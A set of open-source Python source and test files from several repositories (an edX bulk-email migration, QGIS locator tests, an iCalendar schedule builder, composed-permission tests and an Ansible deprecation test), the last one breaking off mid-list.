            name='CourseAuthorization',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('course_id', xmodule_django.models.CourseKeyField(unique=True, max_length=255, db_index=True)),
                ('email_enabled', models.BooleanField(default=False)),
            ],
        ),
        # One bulk email sent (or queued) for a course.
        migrations.CreateModel(
            name='CourseEmail',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('slug', models.CharField(max_length=128, db_index=True)),
                ('subject', models.CharField(max_length=128, blank=True)),
                ('html_message', models.TextField(null=True, blank=True)),
                ('text_message', models.TextField(null=True, blank=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('course_id', xmodule_django.models.CourseKeyField(max_length=255, db_index=True)),
                # Audience selector for the email; bytestring choices are
                # intentional (Python 2 era codebase).
                ('to_option', models.CharField(default=b'myself', max_length=64, choices=[(b'myself', b'Myself'), (b'staff', b'Staff and instructors'), (b'all', b'All')])),
                ('template_name', models.CharField(max_length=255, null=True)),
                ('from_addr', models.CharField(max_length=255, null=True)),
                ('sender', models.ForeignKey(default=1, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
            ],
        ),
        # Named HTML/plaintext template pair used to render course emails.
        migrations.CreateModel(
            name='CourseEmailTemplate',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('html_template', models.TextField(null=True, blank=True)),
                ('plain_template', models.TextField(null=True, blank=True)),
                ('name', models.CharField(max_length=255, unique=True, null=True, blank=True)),
            ],
        ),
        # Record of a user opting out of bulk email for one course.
        migrations.CreateModel(
            name='Optout',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('course_id', xmodule_django.models.CourseKeyField(max_length=255, db_index=True)),
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),
                ('force_disabled', models.BooleanField(default=False)),
            ],
        ),
        # A user may opt out of a given course at most once.
        migrations.AlterUniqueTogether(
            name='optout',
            unique_together=set([('user', 'course_id')]),
        ),
    ]
| nttks/edx-platform | lms/djangoapps/bulk_email/migrations/0001_initial.py | Python | agpl-3.0 | 3,047 |
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsLocator.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2017 by Nyall Dawson'
__date__ = '6/05/2017'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
import os
from qgis.core import (QgsLocator,
QgsLocatorFilter,
QgsLocatorContext,
QgsLocatorResult,
QgsLocatorModel,
QgsLocatorProxyModel,
QgsLocatorAutomaticModel,
QgsSettings)
from qgis.PyQt.QtCore import QVariant, pyqtSignal, QCoreApplication
from time import sleep
from qgis.testing import start_app, unittest
from qgis.PyQt import sip
# Spin up the QGIS application environment once for the whole test module.
start_app()
class test_filter(QgsLocatorFilter):
    """Test locator filter emitting canned results named '<identifier><n>'.

    Emits 3 results per fetch, or 9 (some assigned to groups) when
    ``groupResult`` is set. ``priority()`` maps identifiers 'a'/'b'/'c' to
    High/Medium/Low.
    """

    def __init__(self, identifier, prefix=None, groupResult=False, parent=None):
        super().__init__(parent)
        self.identifier = identifier
        self._prefix = prefix
        self.groupResult = groupResult

    def clone(self):
        # Bug fix: the original passed ``self.prefix`` -- the bound method --
        # instead of the stored prefix string, so clones ended up with a
        # callable as their prefix. QgsLocator runs filters on their clones,
        # so any prefixed filter was broken after cloning.
        return test_filter(self.identifier, self._prefix, self.groupResult)

    def name(self):
        return 'test_' + self.identifier

    def displayName(self):
        return 'test_' + self.identifier

    def description(self):
        return 'test_description'

    def prefix(self):
        return self._prefix

    def fetchResults(self, string, context, feedback):
        # Emit results one by one, checking for cancellation between each;
        # the short sleep gives the cancellation tests something to interrupt.
        n = 3 if not self.groupResult else 9
        for i in range(n):
            if feedback.isCanceled():
                return
            sleep(0.001)
            result = QgsLocatorResult()
            result.displayString = self.identifier + str(i)
            if self.groupResult:
                # indices 2 and 7 intentionally stay ungrouped
                if i in (0, 1, 3, 5, 6):
                    result.group = 'first group'
                elif i in (4, 8):
                    result.group = 'second group'
            self.resultFetched.emit(result)

    def triggerResult(self, result):
        pass

    def priority(self):
        if self.identifier == 'a':
            return QgsLocatorFilter.High
        elif self.identifier == 'b':
            return QgsLocatorFilter.Medium
        elif self.identifier == 'c':
            return QgsLocatorFilter.Low
        else:
            return QgsLocatorFilter.Medium
class TestQgsLocator(unittest.TestCase):
    # NOTE: these tests drive asynchronous fetching; the recurring
    # ``for i in range(...): sleep(0.002); processEvents()`` loops pump the Qt
    # event loop until queued results have been delivered.
    def testRegisteringFilters(self):
        """Registering/deregistering filters transfers ownership to the locator."""
        l = QgsLocator()
        filter_a = test_filter('a')
        filter_b = test_filter('b')
        l.registerFilter(filter_a)
        l.registerFilter(filter_b)
        self.assertEqual(set(l.filters()), {filter_a, filter_b})
        # ownership should be transferred to locator
        del l
        self.assertTrue(sip.isdeleted(filter_a))
        self.assertTrue(sip.isdeleted(filter_b))
        # try manually deregistering
        l = QgsLocator()
        filter_c = test_filter('c')
        filter_d = test_filter('d')
        l.registerFilter(filter_c)
        l.registerFilter(filter_d)
        self.assertEqual(set(l.filters()), {filter_c, filter_d})
        l.deregisterFilter(filter_c)
        # deregistering deletes the filter immediately, leaves others alone
        self.assertTrue(sip.isdeleted(filter_c))
        self.assertFalse(sip.isdeleted(filter_d))
        self.assertEqual(l.filters(), [filter_d])
        del l
        self.assertTrue(sip.isdeleted(filter_c))
        self.assertTrue(sip.isdeleted(filter_d))
    def testFetchingResults(self):
        """Results from one or several filters are collected via foundResult."""
        # collect result display strings on the function object itself
        def got_hit(result):
            got_hit._results_.append(result.displayString)
        got_hit._results_ = []
        context = QgsLocatorContext()
        # one filter
        l = QgsLocator()
        filter_a = test_filter('a')
        l.registerFilter(filter_a)
        l.foundResult.connect(got_hit)
        l.fetchResults('a', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
        # two filters
        filter_b = test_filter('b')
        l.registerFilter(filter_b)
        got_hit._results_ = []
        l.fetchResults('a', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
    def testFetchingResultsDelayed(self):
        """Same as testFetchingResults but with a filter-side fetch delay."""
        def got_hit(result):
            got_hit._results_.append(result.displayString)
        got_hit._results_ = []
        context = QgsLocatorContext()
        # one filter
        l = QgsLocator()
        filter_a = test_filter('a')
        filter_a.setFetchResultsDelay(100)
        l.registerFilter(filter_a)
        l.foundResult.connect(got_hit)
        l.fetchResults('a', context)
        # longer pump loop to accommodate the 100ms delay
        for i in range(500):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
        # two filters
        filter_b = test_filter('b')
        l.registerFilter(filter_b)
        got_hit._results_ = []
        l.fetchResults('a', context)
        for i in range(500):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
    def testDeleteWhileFetchingResults(self):
        """
        Delete locator whilst fetching results
        """
        def got_hit(result):
            got_hit._results_.append(result.displayString)
        got_hit._results_ = []
        context = QgsLocatorContext()
        l = QgsLocator()
        filter_a = test_filter('a')
        l.registerFilter(filter_a)
        l.foundResult.connect(got_hit)
        l.fetchResults('a', context)
        # must not crash or deadlock
        del l
    def testCancelWhileFetchingResults(self):
        """
        Cancel locator whilst fetching results
        """
        def got_hit(result):
            got_hit._results_.append(result.displayString)
        got_hit._results_ = []
        context = QgsLocatorContext()
        l = QgsLocator()
        filter_a = test_filter('a')
        l.registerFilter(filter_a)
        l.foundResult.connect(got_hit)
        l.fetchResults('a', context)
        # must not crash or deadlock
        l.cancel()
    def testPrefixes(self):
        """
        Test custom (active) prefixes
        """
        def got_hit(result):
            got_hit._results_.append(result.displayString)
        got_hit._results_ = []
        context = QgsLocatorContext()
        l = QgsLocator()
        # filter with prefix
        filter_a = test_filter('a', 'aaa')
        l.registerFilter(filter_a)
        self.assertEqual(filter_a.prefix(), 'aaa')
        self.assertEqual(filter_a.activePrefix(), 'aaa')
        self.assertEqual(filter_a.useWithoutPrefix(), True)
        l.foundResult.connect(got_hit)
        l.fetchResults('aaa a', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
        got_hit._results_ = []
        # by default the filter also runs for non-matching prefixes
        l.fetchResults('bbb b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
        got_hit._results_ = []
        # once useWithoutPrefix is off, only the matching prefix triggers it
        filter_a.setUseWithoutPrefix(False)
        self.assertEqual(filter_a.useWithoutPrefix(), False)
        l.fetchResults('bbb b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(got_hit._results_, [])
        got_hit._results_ = []
        # prefix matching is case-insensitive
        l.fetchResults('AaA a', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2'})
        # test with two filters
        filter_b = test_filter('b', 'bbb')
        l.registerFilter(filter_b)
        self.assertEqual(filter_b.prefix(), 'bbb')
        self.assertEqual(filter_b.activePrefix(), 'bbb')
        got_hit._results_ = []
        l.fetchResults('bbb b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'b0', 'b1', 'b2'})
        l.deregisterFilter(filter_b)
        # test with two filters with same prefix
        filter_b = test_filter('b', 'aaa')
        l.registerFilter(filter_b)
        self.assertEqual(filter_b.prefix(), 'aaa')
        self.assertEqual(filter_b.activePrefix(), 'aaa')
        got_hit._results_ = []
        l.fetchResults('aaa b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'a0', 'a1', 'a2', 'b0', 'b1', 'b2'})
        l.deregisterFilter(filter_b)
        # filter with invalid prefix (less than 3 char)
        filter_c = test_filter('c', 'bb')
        l.registerFilter(filter_c)
        self.assertEqual(filter_c.prefix(), 'bb')
        self.assertEqual(filter_c.activePrefix(), '')
        got_hit._results_ = []
        l.fetchResults('b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'c0', 'c1', 'c2'})
        l.deregisterFilter(filter_c)
        # filter with custom prefix
        QgsSettings().setValue("locator_filters/prefix_test_custom", 'xyz', QgsSettings.Gui)
        filter_c = test_filter('custom', 'abc')
        l.registerFilter(filter_c)
        # the settings override wins over the filter's declared prefix
        self.assertEqual(filter_c.prefix(), 'abc')
        self.assertEqual(filter_c.activePrefix(), 'xyz')
        got_hit._results_ = []
        l.fetchResults('b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'custom0', 'custom1', 'custom2'})
        filter_c.setUseWithoutPrefix(False)
        got_hit._results_ = []
        l.fetchResults('XyZ b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(set(got_hit._results_), {'custom0', 'custom1', 'custom2'})
        l.deregisterFilter(filter_c)
        del l
    def testModel(self):
        """Results populate QgsLocatorModel/ProxyModel, including grouping."""
        m = QgsLocatorModel()
        p = QgsLocatorProxyModel(m)
        p.setSourceModel(m)
        l = QgsLocator()
        filter_a = test_filter('a')
        l.registerFilter(filter_a)
        l.foundResult.connect(m.addResult)
        context = QgsLocatorContext()
        l.fetchResults('a', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        # 4 results - one is locator name
        self.assertEqual(p.rowCount(), 4)
        self.assertEqual(p.data(p.index(0, 0)), 'test_a')
        self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
        self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(p.data(p.index(1, 0)), 'a0')
        self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(p.data(p.index(2, 0)), 'a1')
        self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(p.data(p.index(3, 0)), 'a2')
        self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        m.clear()
        self.assertEqual(p.rowCount(), 0)
        l.fetchResults('b', context)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(p.rowCount(), 4)
        self.assertEqual(p.data(p.index(1, 0)), 'a0')
        self.assertEqual(p.data(p.index(2, 0)), 'a1')
        self.assertEqual(p.data(p.index(3, 0)), 'a2')
        m.deferredClear()
        # should not be immediately cleared!
        self.assertEqual(p.rowCount(), 4)
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(p.rowCount(), 0)
        m.clear()
        # test with groups
        self.assertEqual(p.rowCount(), 0)
        filter_b = test_filter('b', None, True)
        l.registerFilter(filter_b)
        l.fetchResults('c', context)
        for i in range(200):
            sleep(0.002)
            QCoreApplication.processEvents()
        self.assertEqual(p.rowCount(), 16)  # 1 title a + 3 results + 1 title b + 2 groups + 9 results
        self.assertEqual(p.data(p.index(0, 0)), 'test_a')
        self.assertEqual(p.data(p.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
        self.assertEqual(p.data(p.index(1, 0)), 'a0')
        self.assertEqual(p.data(p.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(2, 0)), 'a1')
        self.assertEqual(p.data(p.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(3, 0)), 'a2')
        self.assertEqual(p.data(p.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(4, 0)), 'test_b')
        self.assertEqual(p.data(p.index(4, 0), QgsLocatorModel.ResultTypeRole), 0)
        self.assertEqual(p.data(p.index(4, 0), QgsLocatorModel.ResultFilterNameRole), 'test_b')
        # grouped results: group header rows followed by their members
        self.assertEqual(p.data(p.index(5, 0)).strip(), 'first group')
        self.assertEqual(p.data(p.index(5, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(6, 0)), 'b0')
        self.assertEqual(p.data(p.index(6, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(7, 0)), 'b1')
        self.assertEqual(p.data(p.index(7, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(8, 0)), 'b3')
        self.assertEqual(p.data(p.index(8, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(9, 0)), 'b5')
        self.assertEqual(p.data(p.index(9, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(10, 0)), 'b6')
        self.assertEqual(p.data(p.index(10, 0), QgsLocatorModel.ResultTypeRole), 1)
        self.assertEqual(p.data(p.index(11, 0)).strip(), 'second group')
        self.assertEqual(p.data(p.index(11, 0), QgsLocatorModel.ResultTypeRole), 2)
        self.assertEqual(p.data(p.index(12, 0)), 'b4')
        self.assertEqual(p.data(p.index(12, 0), QgsLocatorModel.ResultTypeRole), 2)
        self.assertEqual(p.data(p.index(13, 0)), 'b8')
        self.assertEqual(p.data(p.index(13, 0), QgsLocatorModel.ResultTypeRole), 2)
        # ungrouped results from filter b come last
        self.assertEqual(p.data(p.index(14, 0)), 'b2')
        self.assertEqual(p.data(p.index(14, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(p.data(p.index(15, 0)), 'b7')
        self.assertEqual(p.data(p.index(15, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
    def testAutoModel(self):
        """
        Test automatic model, QgsLocatorAutomaticModel - should be no need
        for any manual connections
        """
        l = QgsLocator()
        m = QgsLocatorAutomaticModel(l)
        filter_a = test_filter('a')
        l.registerFilter(filter_a)
        m.search('a')
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        # 4 results - one is locator name
        self.assertEqual(m.rowCount(), 4)
        self.assertEqual(m.data(m.index(0, 0)), 'test_a')
        self.assertEqual(m.data(m.index(0, 0), QgsLocatorModel.ResultTypeRole), 0)
        self.assertEqual(m.data(m.index(0, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(m.data(m.index(1, 0)), 'a0')
        self.assertEqual(m.data(m.index(1, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(m.data(m.index(1, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(m.data(m.index(2, 0)), 'a1')
        self.assertEqual(m.data(m.index(2, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(m.data(m.index(2, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        self.assertEqual(m.data(m.index(3, 0)), 'a2')
        self.assertEqual(m.data(m.index(3, 0), QgsLocatorModel.ResultTypeRole), QgsLocatorModel.NoGroup)
        self.assertEqual(m.data(m.index(3, 0), QgsLocatorModel.ResultFilterNameRole), 'test_a')
        # a repeated search resets and repopulates the model
        m.search('a')
        for i in range(100):
            sleep(0.002)
            QCoreApplication.processEvents()
        # 4 results - one is locator name
        self.assertEqual(m.rowCount(), 4)
        self.assertEqual(m.data(m.index(0, 0)), 'test_a')
        self.assertEqual(m.data(m.index(1, 0)), 'a0')
        self.assertEqual(m.data(m.index(2, 0)), 'a1')
        self.assertEqual(m.data(m.index(3, 0)), 'a2')
    def testStringMatches(self):
        """Case-insensitive substring matching; empty search never matches."""
        self.assertFalse(QgsLocatorFilter.stringMatches('xxx', 'yyyy'))
        self.assertTrue(QgsLocatorFilter.stringMatches('axxxy', 'xxx'))
        self.assertTrue(QgsLocatorFilter.stringMatches('aXXXXy', 'xxx'))
        self.assertFalse(QgsLocatorFilter.stringMatches('aXXXXy', ''))
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
| pblottiere/QGIS | tests/src/python/test_qgslocator.py | Python | gpl-2.0 | 17,778 |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
from datetime import date, datetime, timedelta
from icalendar import Calendar, Event, vRecur
import json
import os.path
from os.path import dirname
from uuid import uuid4
class iCalSchedule(object):
    """Builds an iCalendar document of weekly recurring events from a scraper."""

    # RFC 5545 two-letter weekday codes, indexed by Python weekday (0=Monday).
    DAYS = ['MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU']

    def __init__(self, scraper, startdate=None, enddate=None):
        """Collect the scraper's events into a recurring-event calendar.

        Missing start/end dates default to the period looked up in the
        bundled ``dates.json`` for the scraper's period/year/semester.
        """
        if startdate is None or enddate is None:
            default_start, default_end = self._get_dates(
                scraper.period, scraper.year, scraper.semester)
            startdate = default_start if startdate is None else startdate
            enddate = default_end if enddate is None else enddate
        self.startdate = startdate
        # The 'DTEND' property is exclusive, so store one day past the end
        self.enddate = enddate + timedelta(days=1)
        self._first_weekdays = {}  # weekday index -> first matching date (cache)
        self._init_ical()
        for event in scraper.get_events():
            self.add_event(event)

    def _init_ical(self):
        """Create the empty calendar container with its standard properties."""
        calendar = Calendar()
        for prop, value in (('version', '2.0'),
                            ('prodid', '-//edt2ics//bfontaine.net//'),
                            ('method', 'publish')):
            calendar.add(prop, value)
        self.cal = calendar

    def _recur_params(self, wday):
        """Return the RRULE parameters for a weekly recurrence on *wday*."""
        return dict(freq='weekly',
                    wkst=self.DAYS[0],
                    byday=self.DAYS[wday],
                    until=self.enddate)

    def _get_first_weekday(self, day):
        """
        Return the first date after ``self.startdate`` which is on the given
        weekday (0=Monday, 1=Tuesday, etc)
        """
        if day not in self._first_weekdays:
            offset = (day - self.startdate.weekday() + 7) % 7
            self._first_weekdays[day] = self.startdate + timedelta(days=offset)
        return self._first_weekdays[day]

    def _get_dates(self, period, year, semester):
        """Look up the default (start, end) dates in the bundled dates.json."""
        source = os.path.join(dirname(__file__), 'dates.json')
        with open(source, 'r') as f:
            data = json.load(f)
        dates = data['dates'][period][str(semester)][year]
        return self._str2date(dates['start']), self._str2date(dates['end'])

    def _str2date(self, s):
        """Parse a 'YYYY-MM-DD' string into a ``datetime.date``."""
        year, month, day = (int(part, 10) for part in s.split('-'))
        return date(year, month, day)

    def add_event(self, ev):
        """
        Add a new recurrent event to this schedule
        """
        first_day = self._get_first_weekday(ev.day)
        timezone = {'tzid': 'Europe/Paris'}
        entry = Event()
        entry.add('uid', str(uuid4()))
        entry.add('status', 'confirmed')
        entry.add('dtstart', datetime.combine(first_day, ev.tstart), parameters=timezone)
        entry.add('dtend', datetime.combine(first_day, ev.tend), parameters=timezone)
        entry.add('rrule', vRecur(self._recur_params(ev.day)))
        entry.add('summary', '%s %s' % (ev.type_, ev.title))
        entry.add('location', ev.room)
        entry.add('description', ev.description)
        self.cal.add_component(entry)

    def to_ical(self):
        """Serialize the calendar to its iCalendar byte representation."""
        return self.cal.to_ical()
| bfontaine/edt2ics | edt2ics/ical.py | Python | mit | 3,060 |
# -*- coding: utf-8 -*-
import unittest
from .base import BaseComposedPermission
from .base import BasePermissionComponent
from .base import And, Or
def create_component(value, instance=False):
    """Build a permission component whose checks always answer *value*.

    Returns the component class itself, or an instance of it when
    *instance* is true.
    """
    class SimpleComponent(BasePermissionComponent):
        def has_permission(self, permission, request, view):
            return value

        def has_object_permission(self, permission, request, view, obj):
            return value

    return SimpleComponent() if instance else SimpleComponent
def create_permission(callback1, callback2=None):
    """Build a composed-permission class from permission-set factories.

    *callback1* supplies the global permission set, *callback2* (optional)
    the object permission set; each attribute is only defined when its
    factory is truthy.
    """
    class Permission(BaseComposedPermission):
        if callback1:
            def global_permission_set(self):
                return callback1()
        if callback2:
            def object_permission_set(self):
                return callback2()

    return Permission
class CorePermissionFrameworkTests(unittest.TestCase):
    # Exercises And/Or composition of permission components built by the
    # create_component/create_permission helpers above.
    #
    # NOTE(review): the recurring ``assertTrue(len(...), N)`` calls pass the N
    # as assertTrue's *message* argument, so they succeed whenever len() is
    # nonzero; ``assertEqual(len(...), N)`` was probably intended -- confirm.
    def test_permission_with_unique_component(self):
        # a single component class is accepted as a permission set
        Component = create_component(True)
        Permission = create_permission(lambda: Component, None)
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        #self.assertTrue(len(permission._permission_set.components), 1)
    def test_permission_with_two_components_as_list(self):
        # a list of component classes is also accepted
        Component = create_component(True)
        Permission = create_permission(lambda: [Component, Component], None)
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        self.assertTrue(len(permission.global_permission_set()), 2)
    def test_permission_with_or_permission_set_01(self):
        # Or(...) over component classes: all True -> grants
        Permission = create_permission(lambda: Or(
            create_component(True),
            create_component(True),
            create_component(True)), None)
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        self.assertTrue(len(permission.global_permission_set().components), 3)
    def test_permission_with_or_permission_set_02(self):
        # | operator only works for instances and not classes
        components = (lambda: Or(
            create_component(False)(),
            create_component(False)(),
            create_component(True)()))
        Permission = create_permission(components, components)
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        self.assertTrue(permission.has_object_permission(None, None, None))
        self.assertIsInstance(permission.global_permission_set(), Or)
        self.assertTrue(len(permission.global_permission_set().components), 3)
    def test_permission_with_or_permission_set_03(self):
        # | operator only works for instances and not classes
        components = (lambda:
                      create_component(False)() |
                      create_component(False)() |
                      create_component(True)())
        Permission = create_permission(components, components)
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        self.assertTrue(permission.has_object_permission(None, None, None))
        self.assertTrue(len(permission.object_permission_set().components), 3)
    def test_permission_with_and_permission_set_01(self):
        # And(...): all True -> grants
        Permission = create_permission(lambda: And(
            create_component(True),
            create_component(True),
            create_component(True)))
        permission = Permission()
        self.assertTrue(permission.has_permission(None, None))
        self.assertTrue(len(list(permission.global_permission_set().components)), 3)
    def test_permission_with_and_permission_set_02(self):
        # And(...): any False -> denies
        Permission = create_permission(lambda: And(
            create_component(False),
            create_component(False),
            create_component(True)))
        permission = Permission()
        self.assertFalse(permission.has_permission(None, None))
        self.assertTrue(len(list(permission.global_permission_set().components)), 3)
    def test_permission_with_and_permission_set_03(self):
        # & operator over instances builds an And set
        Permission = create_permission(lambda: create_component(False)() &
                                       create_component(False)() &
                                       create_component(True)() )
        permission = Permission()
        self.assertFalse(permission.has_permission(None, None))
        self.assertTrue(len(permission.global_permission_set().components), 3)
    def test_permission_with_complex_compositions_01(self):
        # (T & T) | F -> grants
        TrueComponent = create_component(True)
        FalseComponent = create_component(False)
        permissions_set = (TrueComponent() & TrueComponent()) | FalseComponent()
        permission = create_permission(lambda: permissions_set)()
        self.assertTrue(permission.has_permission(None, None))
    def test_permission_with_complex_compositions_02(self):
        # (T & T) & (F | (T & T)) -> grants
        TrueComponent = create_component(True)
        FalseComponent = create_component(False)
        permissions_set = ((TrueComponent() & TrueComponent()) &
                           (FalseComponent() | (TrueComponent() & TrueComponent())))
        permission = create_permission(lambda: permissions_set)()
        self.assertTrue(permission.has_permission(None, None))
    def test_permission_with_complex_compositions_03(self):
        # (T & T) & (F | (F & T)) -> denies
        TrueComponent = create_component(True)
        FalseComponent = create_component(False)
        permissions_set = ((TrueComponent() & TrueComponent()) &
                           (FalseComponent() | (FalseComponent() & TrueComponent())))
        permission = create_permission(lambda: permissions_set)()
        self.assertFalse(permission.has_permission(None, None))
from .generic import components
class GenericComponentsTests(unittest.TestCase):
def make_mock(self):
class Mock(object):
pass
return Mock()
def make_request(self):
request = self.make_mock()
request.user = self.make_mock()
return request
def test_allow_all(self):
instance = components.AllowAll()
self.assertTrue(instance.has_permission(None, None, None))
def test_allow_only_anonymous(self):
request = self.make_request()
request.user.is_anonymous = lambda: True
instance = components.AllowOnlyAnonymous()
self.assertTrue(instance.has_permission(None, request, None))
def test_allow_authenticated(self):
request = self.make_request()
request.user.is_anonymous = lambda: False
instance = components.AllowOnlyAuthenticated()
self.assertTrue(instance.has_permission(None, request, None))
def test_allow_safe_method_only(self):
request = self.make_request()
request.method = "GET"
instance = components.AllowOnlySafeHttpMethod()
self.assertTrue(instance.has_permission(None, request, None))
def test_obj_attr_equality(self):
obj = self.make_mock()
obj.x = 1
obj.y = 1
instance = components.ObjectAttrEqualToObjectAttr("obj.x", "obj.y")
self.assertTrue(instance.has_object_permission(None, None, None, obj))
| pombredanne/djangorestframework-composed-permissions | restfw_composed_permissions/tests.py | Python | bsd-3-clause | 7,449 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import pytest
from ansible.module_utils.common import warnings
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_warn(am, capfd):
    """warn() calls and exit_json(warnings=...) are merged into the output."""
    am.warn('warning1')
    with pytest.raises(SystemExit):
        am.exit_json(warnings=['warning2'])
    stdout, _ = capfd.readouterr()
    assert json.loads(stdout)['warnings'] == ['warning1', 'warning2']
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_deprecate(am, capfd, monkeypatch):
    """deprecate() accepts version/date/collection_name in every combination."""
    monkeypatch.setattr(warnings, '_global_deprecations', [])

    am.deprecate('deprecation1')
    am.deprecate('deprecation2', '2.3')  # pylint: disable=ansible-deprecated-no-collection-name
    am.deprecate('deprecation3', version='2.4')  # pylint: disable=ansible-deprecated-no-collection-name
    am.deprecate('deprecation4', date='2020-03-10')  # pylint: disable=ansible-deprecated-no-collection-name
    am.deprecate('deprecation5', collection_name='ansible.builtin')
    am.deprecate('deprecation6', '2.3', collection_name='ansible.builtin')
    am.deprecate('deprecation7', version='2.4', collection_name='ansible.builtin')
    am.deprecate('deprecation8', date='2020-03-10', collection_name='ansible.builtin')
    with pytest.raises(SystemExit):
        am.exit_json(deprecations=['deprecation9', ('deprecation10', '2.4')])

    stdout, _ = capfd.readouterr()
    result = json.loads(stdout)
    # No warnings expected, only deprecations.
    assert result.get('warnings', []) == []
    assert result['deprecations'] == [
        {u'msg': u'deprecation1', u'version': None, u'collection_name': None},
        {u'msg': u'deprecation2', u'version': '2.3', u'collection_name': None},
        {u'msg': u'deprecation3', u'version': '2.4', u'collection_name': None},
        {u'msg': u'deprecation4', u'date': '2020-03-10', u'collection_name': None},
        {u'msg': u'deprecation5', u'version': None, u'collection_name': 'ansible.builtin'},
        {u'msg': u'deprecation6', u'version': '2.3', u'collection_name': 'ansible.builtin'},
        {u'msg': u'deprecation7', u'version': '2.4', u'collection_name': 'ansible.builtin'},
